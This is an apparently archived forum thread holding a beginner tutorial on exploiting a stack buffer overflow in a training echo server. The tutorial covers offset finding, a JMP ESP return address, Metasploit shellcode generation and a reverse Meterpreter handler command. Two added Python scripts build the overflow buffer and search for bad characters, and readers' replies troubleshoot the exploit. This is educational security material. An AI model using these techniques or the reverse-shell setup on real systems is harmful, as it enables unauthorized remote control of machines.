matugm, posted September 10, 2010

Hello guys! I wanted to do a little guide on exploitation to complement what is taught on the course, so I assume you know the basics already. I hope you find it useful.

Target download: server.exe

Knowing our target

OK, so we have this program called "server.exe" which we have been told to audit. The only thing we know about it is that this is a custom application that is run on one of our customer's servers, so let's run it ourselves and see what it does.

Interesting, so let's connect to it using netcat.

So it looks like we have a custom echo server. Now why would anyone actually need this? No one knows, but this information should be enough to start with our actual audit.

Testing for overflows

Now we are gonna drop our application into Olly and leave it listening, and we are gonna make a Python script that will eventually become our exploit. But let's not get too far ahead of ourselves; first we need to check if there is a vulnerability, so our initial script will be something like this:

It's very simple: we create a buffer with 200 A's (now this could be any letter, it doesn't matter). We will feed this buffer to our target application to try and make it break, and since Olly is attached to it we will be able to see some interesting information. Now let's do this!

Oops! Looks like we didn't hit it hard enough! So let's give it what it wants!

We are now going to use a bigger buffer: A * 500. Now it will crash, and we check Olly. So this means it tried to read 41414141 (AAAA in hex) as its next instruction to execute (EIP). There is a very good chance we can control the execution flow and make it do whatever we want in the context of the user that the application is running under (meaning that if it runs with admin privileges we pretty much own the box; otherwise we can still get a shell back, but with lower privileges).

Finding the offset

Next step: now we need to find the offset. This is the number of bytes we need to reach and overwrite the return address. The best way to do this is using the Metasploit tools pattern_create.rb and pattern_offset.rb. In BackTrack these tools are located in the directory:

We issue this command:

What we get back is a 500 byte string that we will now feed into our target instead of the 500 A's, so we change our buffer variable to this:

And now we restart the server (Ctrl+2 to restart and F9 to run it in Olly) and launch our script again. It will crash; let's look at Olly. We will take this value into the pattern_offset.rb tool and it will give us our offset. Easy enough?

Now let's test this. We are gonna empty our buffer variable and this time we are gonna use A's again, but instead of a random number we will be using our offset and test it. Our buffer variable should now look something like this:

Notice we now have B and C; these are the placeholders for our return address and shellcode, respectively. If all goes right, now we should be able to crash the target again and the value of EIP should be 42424242 (BBBB in hex).

Getting a return address

What we need now is a return address that will make the execution flow jump into our shellcode. If you watch Olly with the last crash and 'Follow in dump' the ESP register, you will see that's exactly where our C's start, and remember this is our placeholder for the shellcode. But to get there first we need an address with a JMP ESP instruction or equivalent (call, pop ret), so what we can do to find this address is load kernel32.dll (you can also use user32.dll most of the time, and it has way more addresses available) into Olly or IDA and look for the instruction that way, or even better use a proper tool for the job. There are 2 good tools for this; one is included with the Metasploit framework, the tool is called 'msfpescan'. The command to find a JMP ESP instruction with this tool is:

The other tool is findjmp2, which you can download here.

You should be able to use any as long as it doesn't contain any null characters (00), because that would break our exploit; remember a null character terminates a string. Now we are gonna test this.

Let's go to Olly and go to this memory location (Ctrl+G) and put a breakpoint here (F2), restart the server and launch our script; we should land at the JMP ESP instruction. And if we step in we should see our C's. Now we are ready to change these for something useful!

Creating some shellcode

We are getting close; now we just need to replace our shellcode placeholder with a real one. I assume you already know what shellcode is, but a small recap here: basically it is a piece of machine code that will return us a shell or do anything we want, like adding a user on the system. You can make these by hand, but I won't cover that here, so no problem, Metasploit to the rescue again! We are going to use the msfpayload and msfencode tools; issue this command:

Please notice you will need to adjust the IP address to the one of your BackTrack machine. So we are telling msfpayload to create a reverse Meterpreter shellcode for us with these parameters, and then we pipe it through msfencode, which will encode our shellcode, mainly for 2 reasons: the most important is getting rid of characters that would break our shellcode (the -b option), and getting past some IDS.

Exploit time!

At this point our final exploit should look something like this:

Start a payload handler issuing this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And if everything went right you should get a session. Finally, the two main problems you will run into while working on an exploit: a bad return address (remember every SP and language will have different system libs (user32, kernel32...), so make sure you get an address for the correct Windows version and language), and bad chars in the shellcode. I actually wanted to bash my head against a wall so many times with this one, so if everything works right until the point of using real shellcode, this is the most probable case.

Please comment; suggestions etc. are appreciated. Have fun!
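Added example, not code from matugm's post or from Metasploit: the procedure above (a cyclic pattern in place of the A's, reading the EIP value back as an offset, then assembling 'A' * offset + little-endian return address + NOP sled + shellcode) as one Python 3 script that runs without a target. The offset 268, the return address 0x7c86467b and the four INT3 bytes standing in for shellcode are made-up placeholders, not values taken from server.exe or any real DLL; `simulated_crash_eip` only mimics what the debugger would show when the overwritten return address is popped into EIP.

```python
import string
import struct

# Added example, not code from matugm's post: the pattern_create /
# pattern_offset logic and the final buffer layout, runnable with no target.
# The offset (268), the return address (0x7c86467b) and the 4 INT3 bytes used
# as "shellcode" are made-up placeholders, not values from server.exe or any
# real DLL.

# Metasploit's pattern: every triplet is Upper + lower + digit, so the
# sequence Aa0Aa1...Aa9Ab0... does not repeat for 26*26*10*3 = 20280 bytes
# and any 4-byte window inside it occurs exactly once.
_PERIOD = b"".join(
    (u + l + d).encode()
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)


def pattern_create(length):
    """Same output as pattern_create.rb <length>."""
    reps = length // len(_PERIOD) + 1
    return (_PERIOD * reps)[:length]


def pattern_offset(value, length=len(_PERIOD)):
    """Same job as pattern_offset.rb: value is the dword Olly showed in EIP
    (an int such as 0x6a413969) or the 4 raw bytes. x86 is little-endian, so
    the int is packed '<I' before searching; the first byte in memory is the
    lowest byte of the register value."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def simulated_crash_eip(buf, saved_eip_offset):
    """Stand-in for the crash in Olly: the four bytes of our buffer that
    overwrite the saved return address are what ends up in EIP."""
    return struct.unpack("<I", buf[saved_eip_offset:saved_eip_offset + 4])[0]


def build_exploit(offset, ret_addr, shellcode, nop_len=16, bad=b"\x00"):
    """'A' * offset | JMP ESP address, little-endian | NOP sled | shellcode.
    Refuses an address or shellcode containing bad bytes (NUL by default,
    which would terminate the string before the whole buffer is copied)."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = sorted(set(b for b in blob if b in bad))
        if hit:
            raise ValueError("%s contains bad byte(s): %s"
                             % (name, " ".join("\\x%02x" % b for b in hit)))
    return b"A" * offset + ret + b"\x90" * nop_len + shellcode


if __name__ == "__main__":
    # Step 1: a 500-byte pattern instead of 500 A's; "crash" at the placeholder offset.
    probe = pattern_create(500)
    eip = simulated_crash_eip(probe, 268)          # what Olly would show in EIP
    print("EIP = 0x%08x -> offset %d" % (eip, pattern_offset(eip)))
    # Step 2: A's up to the offset, then address, NOP sled and placeholder shellcode.
    exploit = build_exploit(pattern_offset(eip), 0x7c86467b, b"\xcc" * 4)
    print("final buffer: %d bytes, EIP would be 0x%08x"
          % (len(exploit), simulated_crash_eip(exploit, 268)))
```

The little-endian packing is the detail that trips people up when doing this by hand: if Olly shows EIP = 6A413969, the bytes in the buffer were "i9Aj" (69 39 41 6A), which is why pattern_offset.rb accepts the register value directly and reverses it for you, and why the JMP ESP address must be written into the buffer reversed as well.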
Armando, posted September 11, 2010

Loving this kind of thread...

matugm, posted September 12, 2010

Yeah, would be nice if more people would contribute... anyway, I feel like I'm the only person checking this forum daily.

Bluntlee, posted September 13, 2010

Thanks for sharing your work. I check the forum almost daily, but I am still in the early stages of understanding everything.

ghancock, posted September 17, 2010

Awesome post. Thanks, keep them coming!!
glenn

robertray, posted October 14, 2010

Again, I think that a separate forum perhaps for custom tutorials for these kinds of posts would be excellent. Still not this far ahead though, so I will wait to test it out. But thanks for the efforts, I really appreciate active members :-)

Destron, posted November 1, 2010

Very nice tutorial here!!! Keep up the good work!!!

robertray, posted March 26, 2011

Bit of a bump. Still think this would be cool as a sticky. I mean to come back to try this out.
t3rm1t, posted March 29, 2011

Hello Matugm. Awesome guide, but when I simulate this situation on 2 VirtualBox machines, one of them WinXP SP3 and the other BT, it fully worked until the moment when I send the shellcode: OllyDbg says "Access violation when reading [0000028C]..." and there is no shell in msf. The return address is right (I checked this with a breakpoint in Olly). Maybe not enough memory for the shell, or bad encoding with msfencode? Any ideas?

matugm, posted March 29, 2011

Umm, there should be enough space for a Meterpreter. Anyway, you might want to try with a simpler payload first, like executing calc.exe. If you follow along the execution with OllyDbg and the only problem is the shellcode, it might be an encoding issue, also space, but if I remember right this is not the case.

calc.exe shellcode:

msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -t c

t3rm1t, posted April 1, 2011

Hmm. With the calc shellcode it did not work either: "Access violation when reading [00000235]..." I think this is another problem than lack of memory. Maybe it is a VirtualBox feature in the architecture. I'll try this on a live host. Any ideas?

matugm, posted April 1, 2011

Can you post your exploit please? http://pastie.org/

t3rm1t, posted April 2, 2011

Quoting matugm: "can you post your exploit please http://pastie.org/"

Here it is: http://pastie.org/private/ozumdwcylschkh5mrq where 10.1.1.15 is the victim IP address and the payload is cmd calc. Also I checked this locally (changed to 127.0.0.1 and tried from the victim, no effect).

matugm, posted April 2, 2011

t3rm1t, I have tested your exploit and I noticed that after the jmp esp you don't land on the NOPs+shellcode. Then, paying closer attention to your code, I noticed you missed the x on the NOPs: buf += '\90' * 16, and the correct is buf += '\x90' * 16. After this change your exploit works. This is how it should look when you jump to esp...

t3rm1t, posted April 2, 2011

You are right, it is a stupid omission. Thanks. It is working fine now.
illumina, posted April 12, 2011

Hi matugm, first up, thanks for the tutorial. Although the English was a little hard to understand in certain places, it is overall a very easy to follow tutorial. I have read through this and understand the theory, but haven't yet tried it in practice. I only have one question for you: when you put in the shellcode, you changed the 3rd buffer from 'C' * 500 to '\x90' * 16. Why is this? This may be obvious to me if I actually follow the tutorial in practice, or it may not be, but either way I just wanted to clear that up. Thank you again for such a wonderful beginners' tutorial to exploits!

matugm, posted April 12, 2011

Good question. '\x90' * 16 is a "NOP sled"; basically this means your code execution will land in between a bunch of NOP instructions, and since they do nothing the execution of the program will just flow to the next instruction after the end of the sled, which should be your shellcode. Hope this clears your doubt.

illumina, posted April 13, 2011

Quoting matugm: "Good question. '\x90' * 16 is a "NOP sled"; basically this means your code execution will land in between a bunch of NOP instructions, and since they do nothing the execution of the program will just flow to the next instruction after the end of the sled, which should be your shellcode. Hope this clears your doubt."

Makes perfect sense. Thanks for clearing that up for me!

Ninjastyle971, posted July 21, 2011

Awesome tutorial dude, I'll try it!! Thanks for the share.
schuydorsey, posted November 17, 2011

Hey mat, great tutorial. Quick question. Upon learning buffer overflows more in depth, I see the NULL character can be a real problem in your shellcode, as it would terminate the string. How does one determine what all of the null characters are? Is it OS or application specific?

matugm, posted November 28, 2011

The null character is \x00, which is the first character in the ASCII table. What you are looking for is generally known as "bad characters": those are characters that are either filtered or have a special meaning for the application, so it depends on the program you are working on. For example, think of an app that reads in a single word and ignores everything after a space; in this case, if your shellcode contained a space character (\x20) in the middle it would break, because not all the shellcode would be copied into the buffer. Here is a pretty good article about this:

http://insidetrust.blogspot.com/2011/02/using-backtrack-to-spot-bad-characters.html
http://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit#Dealing_with_badchars
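Added example, not code from this thread: the bad-character search matugm describes, as a Python 3 script. Against a real target you would send every byte value, look at the buffer in Olly's dump window and note the first byte that was dropped or altered; here a constructed toy stands in for the target (it keeps only the first "word", i.e. stops at the first space as in the example above, and additionally turns CR into LF), and the script diffs what was sent against what the target kept, marks the first byte that did not survive as bad, removes it from the probe and repeats until both match. NUL is assumed bad up front, as the post says. The result is formatted as an msfencode -b string. The toy's behaviour is an assumption for the demo, not the behaviour of server.exe.

```python
# Added example (not matugm's code): find "bad characters" by diffing what we
# send against what the target actually kept, one bad byte per round.

ALL_BYTES = bytes(range(1, 256))  # 0x00 is assumed bad from the start: it ends a C string


def toy_target(data):
    """Constructed stand-in for the vulnerable program (NOT server.exe).
    It keeps only the first "word", i.e. stops at the first space, as in
    matugm's example, and normalises CR (\\x0d) to LF (\\x0a) on the way in.
    With a real target this function would be: send `data`, then read the
    buffer back from the debugger's memory dump."""
    word = data.split(b" ", 1)[0]
    return word.replace(b"\r", b"\n")


def first_mismatch(sent, kept):
    """Index of the first byte that was truncated away or altered, or None
    when everything survived."""
    for i, b in enumerate(sent):
        if i >= len(kept) or kept[i] != b:
            return i
    return None


def find_bad_chars(target, assumed_bad=b"\x00", max_rounds=255):
    """Send all candidate bytes; the first byte that did not survive is bad.
    Drop it from the probe and resend, because everything after a truncation
    or shift is unreliable until that byte is gone. Stop when the kept buffer
    equals the probe."""
    bad = set(assumed_bad)
    for _ in range(max_rounds):
        probe = bytes(b for b in ALL_BYTES if b not in bad)
        idx = first_mismatch(probe, target(probe))
        if idx is None:
            return sorted(bad)
        bad.add(probe[idx])
    raise RuntimeError("bad-char search did not converge")


def msfencode_badchars(bad):
    """Format the list for msfencode -b, e.g. '\\x00\\x0d\\x20'."""
    return "".join("\\x%02x" % b for b in bad)


if __name__ == "__main__":
    bad = find_bad_chars(toy_target)
    print("bad chars:", msfencode_badchars(bad))
```

One round per bad byte is deliberate: once a byte is dropped or the copy stops, every later position in the dump is shifted, so comparing past the first mismatch would flag good bytes as bad. Re-sending without the known bad bytes keeps the comparison aligned.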
Patrick, posted January 22, 2013

From hacking to cracking, cool! As always I am a little late to respond... but... Nice tut, I will play with OllyDbg and server.exe a little (as soon as I tame Symantec Endpoint Protection).

Omega, posted May 8, 2013

Thanks Sir, I got my reverse connection successfully, and thank you very much for posting this. Please post some buffer overflow challenges; I'd like to improve my knowledge in software exploitation.

schuydorsey, posted May 10, 2013

Quoting Omega: "Thanks Sir, I got my reverse connection successfully, and thank you very much for posting this. Please post some buffer overflow challenges; I'd like to improve my knowledge in software exploitation."

I like that idea... perhaps we should find some good challenges for this. On that note, have you tried a go at the new Gold cert? You just may like it... Also, perhaps you should update your location to something Kali specific :-D